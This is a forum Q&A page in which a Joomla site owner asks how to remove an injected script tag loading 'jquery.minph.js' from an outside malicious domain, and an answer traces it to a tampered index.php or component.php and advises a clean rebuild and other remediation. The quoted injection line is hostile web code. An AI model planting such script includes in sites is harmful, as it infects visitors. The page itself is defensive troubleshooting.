Sign Up

Sign Up to our social questions and Answers Engine to ask questions, answer people’s questions, and connect with other people.

Have an account? Sign In

Have an account? Sign In Now

Sign In

Login to our social questions & Answers Engine to ask questions answer people’s questions & connect with other people.

Sign Up Here

Forgot Password?

Don't have account, Sign Up Here

Forgot Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Have an account? Sign In Now

You must login to ask a question.

Forgot Password?

Need An Account, Sign Up Here

Please briefly explain why you feel this question should be reported.

Please briefly explain why you feel this answer should be reported.

Please briefly explain why you feel this user should be reported.

Sign InSign Up

The Archive Base

The Archive Base Logo The Archive Base Logo

The Archive Base Navigation

  • SEARCH
  • Home
  • About Us
  • Blog
  • Contact Us
Search
Ask A Question

Mobile menu

Close
Ask a Question
  • Home
  • Add group
  • Groups page
  • Feed
  • User Profile
  • Communities
  • Questions
    • New Questions
    • Trending Questions
    • Must read Questions
    • Hot Questions
  • Polls
  • Tags
  • Badges
  • Buy Points
  • Users
  • Help
  • Buy Theme
  • SEARCH
Home/ Questions/Q 6822061
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Editorial Team
Asked: May 26, 20262026-05-26T21:37:06+00:00 2026-05-26T21:37:06+00:00

Here is my website. http://ziggymonster.com/ At first it was having 4 torjan infected js

  • 0

Here is my website.
http://ziggymonster.com/

At first it was having 4 torjan infected js files and some malicious code. I have cleaned that files. But now i am unable to find this javascript include.

<script src="http://boneraffyaho.cz.cc/jquery.minph.js"></script>

You can see by viewing source of page.

It is included at end of each. It keep page on loading and scanner detects it as malicious code.

The thing which i have tried so far.

1) Changed template
2) Try to disable all components.
3) try to disable all components.
4) tried to disable all plugins.
5) downloaded complete site and searched for this code in complete site. But could not find.

But it was still there. Can you give me some suggestions?

  • 1 1 Answer
  • 0 Views
  • 0 Followers
  • 0
Share
  • Facebook
  • Report

Leave an answer
Cancel reply

You must login to add an answer.

Forgot Password?

Need An Account, Sign Up Here

1 Answer

  • Voted
  • Oldest
  • Recent
  • Random
  1. Editorial Team
    Editorial Team
    2026-05-26T21:37:07+00:00Added an answer on May 26, 2026 at 9:37 pm

    The malicious code is present within the page even when javascript is disabled – this tells us it isn’t being written there by a document.write within other js files.

    When we visit the site with the tmpl=component&no_html=1 settings which suppress template output and send only the component’s output the code is still present:
    http://ziggymonster.com/?tmpl=component&no_html=1

    This would point quite strongly to the code having being appended at the end of the main Joomla index.php file in the root of your website. Alternatively the component.php file in your template’s own folder or in the /templates/system/ folder may be viable candidates.

    Cleansing a site in situ is risky – but can be done with the right knowledge, some experience and the right tools. I’d advise finding an experienced Joomla security expert to do so, or face re-building the site’s files: install a fresh Joomla in a totally clean folder (localhost server would be best), install all of your extensions, then remove your live site, and upload the files to your web space tying the files to the original database.

    Of course reverting to a backup from a few days ago would be the best option – you do have backups yes?

    You should examine log files for an idea of how the attack was perpetrated. You should also change all passwords, upgrade Joomla and all add-ons – and consider changing web hosts if it looks like another account on the server provided access to allow the hackers in.

    Good luck.

    • 0
    • Reply
    • Share
      Share
      • Share on Facebook
      • Share on Twitter
      • Share on LinkedIn
      • Share on WhatsApp
      • Report

Sidebar

Related Questions

I have a problem with floating divs. Here is my website: http://www.wokarts.com/index.php?option=com_gallery&controller=images&parent=6 I don't
Here's the C# code directly from the website ( http://jobijoy.blogspot.com/2007/10/time-picker-user-control.html ) that everyone refers
I am trying to send data to DotNetOpenAuth website as described here http://msdn.microsoft.com/en-us/library/debx8sh9.aspx Sender
Been trying for ages now and can't work it out. Here's the website http://www.connorhome.com/
I am using facebox which uses jQuery 1.2.1 on my website here http://www.pointclickshoot.com/beta2 The
Here is my website: http://designobvio.us/portfolio/body.html Here's my aspiring website: http://www.googlezeitgeist.com/en/top-searches/battlefield_three I'm getting pretty close
I am trying to create a facebook like website here http://likes.vermilionsite.com/ but when you
here is the website: http://yumeituan.host.181idc.com/ the text of image below is english. when the
Here is an example website http://us.blizzard.com/store/browse.xml?f=c:5,c:33 When I inspect the response in Firefox it
I have a website (here: http://kitandmarcin.us ) with links to a variety of external

Explore

  • Home
  • Add group
  • Groups page
  • Communities
  • Questions
    • New Questions
    • Trending Questions
    • Must read Questions
    • Hot Questions
  • Polls
  • Tags
  • Badges
  • Users
  • Help
  • SEARCH

Footer

© 2021 The Archive Base. All Rights Reserved
With Love by The Archive Base

Insert/edit link

Enter the destination URL

Or link to existing content

    No search term specified. Showing recent items. Search or use up and down arrow keys to select an item.